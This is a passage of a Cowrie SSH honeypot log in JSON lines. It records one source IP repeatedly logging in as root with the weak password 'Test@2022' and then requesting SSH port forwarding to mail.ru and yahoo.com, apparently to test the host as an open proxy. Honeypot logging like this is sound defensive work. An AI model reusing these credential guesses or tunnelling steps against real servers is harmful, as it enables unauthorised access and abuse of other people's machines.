sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:00.664608Z","src_ip":"77.83.207.83","session":"389ab50d5b9e"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:00.743356Z","src_ip":"212.227.235.229","session":"9cf5fcb5bdf7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:00.912212Z","src_ip":"77.83.207.83","session":"389ab50d5b9e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":5973,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:5973","sensor":"my-vps","timestamp":"2025-08-31T03:45:00.963267Z","session":"389ab50d5b9e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:01.013067Z","src_ip":"77.83.207.83","session":"389ab50d5b9e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":15858,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:15858","sensor":"my-vps","timestamp":"2025-08-31T03:45:01.155996Z","session":"389ab50d5b9e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:01.205855Z","src_ip":"77.83.207.83","session":"389ab50d5b9e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":5459,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:5459","sensor":"my-vps","timestamp":"2025-08-31T03:45:01.348043Z","session":"389ab50d5b9e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:01.397963Z","src_ip":"77.83.207.83","session":"389ab50d5b9e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:01.449495Z","src_ip":"77.83.207.83","session":"389ab50d5b9e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":46186,"dst_ip":"1.2.3.4","dst_port":22,"session":"e079cf190a56","protocol":"ssh","message":"New connection: 77.83.207.83:46186 (1.2.3.4:22) [session: e079cf190a56]","sensor":"my-vps","timestamp":"2025-08-31T03:45:01.502142Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:01.503294Z","src_ip":"77.83.207.83","session":"e079cf190a56"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:01.556471Z","src_ip":"77.83.207.83","session":"e079cf190a56"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:01.821812Z","src_ip":"77.83.207.83","session":"e079cf190a56"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":13105,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:13105","sensor":"my-vps","timestamp":"2025-08-31T03:45:01.876445Z","session":"e079cf190a56"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:01.930274Z","src_ip":"77.83.207.83","session":"e079cf190a56"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":23453,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:23453","sensor":"my-vps","timestamp":"2025-08-31T03:45:02.079965Z","session":"e079cf190a56"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:02.133195Z","src_ip":"77.83.207.83","session":"e079cf190a56"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":6238,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:6238","sensor":"my-vps","timestamp":"2025-08-31T03:45:02.279382Z","session":"e079cf190a56"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:02.332523Z","src_ip":"77.83.207.83","session":"e079cf190a56"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:02.387220Z","src_ip":"77.83.207.83","session":"e079cf190a56"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":46264,"dst_ip":"1.2.3.4","dst_port":22,"session":"a92eb64ae3e0","protocol":"ssh","message":"New connection: 77.83.207.83:46264 (1.2.3.4:22) [session: a92eb64ae3e0]","sensor":"my-vps","timestamp":"2025-08-31T03:45:02.436503Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:02.437789Z","src_ip":"77.83.207.83","session":"a92eb64ae3e0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:02.488567Z","src_ip":"77.83.207.83","session":"a92eb64ae3e0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:02.739432Z","src_ip":"77.83.207.83","session":"a92eb64ae3e0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":12362,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:12362","sensor":"my-vps","timestamp":"2025-08-31T03:45:02.790748Z","session":"a92eb64ae3e0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:02.841202Z","src_ip":"77.83.207.83","session":"a92eb64ae3e0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":9825,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:9825","sensor":"my-vps","timestamp":"2025-08-31T03:45:02.984562Z","session":"a92eb64ae3e0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:03.034834Z","src_ip":"77.83.207.83","session":"a92eb64ae3e0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":26283,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:26283","sensor":"my-vps","timestamp":"2025-08-31T03:45:03.176750Z","session":"a92eb64ae3e0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:03.226962Z","src_ip":"77.83.207.83","session":"a92eb64ae3e0"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:03.277982Z","src_ip":"77.83.207.83","session":"a92eb64ae3e0"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":46362,"dst_ip":"1.2.3.4","dst_port":22,"session":"20e4df355afd","protocol":"ssh","message":"New connection: 77.83.207.83:46362 (1.2.3.4:22) [session: 20e4df355afd]","sensor":"my-vps","timestamp":"2025-08-31T03:45:03.327299Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:03.328341Z","src_ip":"77.83.207.83","session":"20e4df355afd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:03.378616Z","src_ip":"77.83.207.83","session":"20e4df355afd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:03.628745Z","src_ip":"77.83.207.83","session":"20e4df355afd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":14128,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:14128","sensor":"my-vps","timestamp":"2025-08-31T03:45:03.680262Z","session":"20e4df355afd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:03.730865Z","src_ip":"77.83.207.83","session":"20e4df355afd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":30079,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:30079","sensor":"my-vps","timestamp":"2025-08-31T03:45:03.872482Z","session":"20e4df355afd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:03.922698Z","src_ip":"77.83.207.83","session":"20e4df355afd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":11680,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:11680","sensor":"my-vps","timestamp":"2025-08-31T03:45:04.064545Z","session":"20e4df355afd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:04.114807Z","src_ip":"77.83.207.83","session":"20e4df355afd"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:04.166499Z","src_ip":"77.83.207.83","session":"20e4df355afd"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":46446,"dst_ip":"1.2.3.4","dst_port":22,"session":"b11754a43499","protocol":"ssh","message":"New connection: 77.83.207.83:46446 (1.2.3.4:22) [session: b11754a43499]","sensor":"my-vps","timestamp":"2025-08-31T03:45:04.217865Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:04.228659Z","src_ip":"77.83.207.83","session":"b11754a43499"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:04.271070Z","src_ip":"77.83.207.83","session":"b11754a43499"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:04.533749Z","src_ip":"77.83.207.83","session":"b11754a43499"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":15718,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:15718","sensor":"my-vps","timestamp":"2025-08-31T03:45:04.587272Z","session":"b11754a43499"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:04.640003Z","src_ip":"77.83.207.83","session":"b11754a43499"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":3963,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:3963","sensor":"my-vps","timestamp":"2025-08-31T03:45:04.787091Z","session":"b11754a43499"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:04.839766Z","src_ip":"77.83.207.83","session":"b11754a43499"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":5017,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:5017","sensor":"my-vps","timestamp":"2025-08-31T03:45:04.987039Z","session":"b11754a43499"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:05.039971Z","src_ip":"77.83.207.83","session":"b11754a43499"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:05.093740Z","src_ip":"77.83.207.83","session":"b11754a43499"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":46522,"dst_ip":"1.2.3.4","dst_port":22,"session":"7efbced88071","protocol":"ssh","message":"New connection: 77.83.207.83:46522 (1.2.3.4:22) [session: 7efbced88071]","sensor":"my-vps","timestamp":"2025-08-31T03:45:05.142984Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:05.143896Z","src_ip":"77.83.207.83","session":"7efbced88071"}
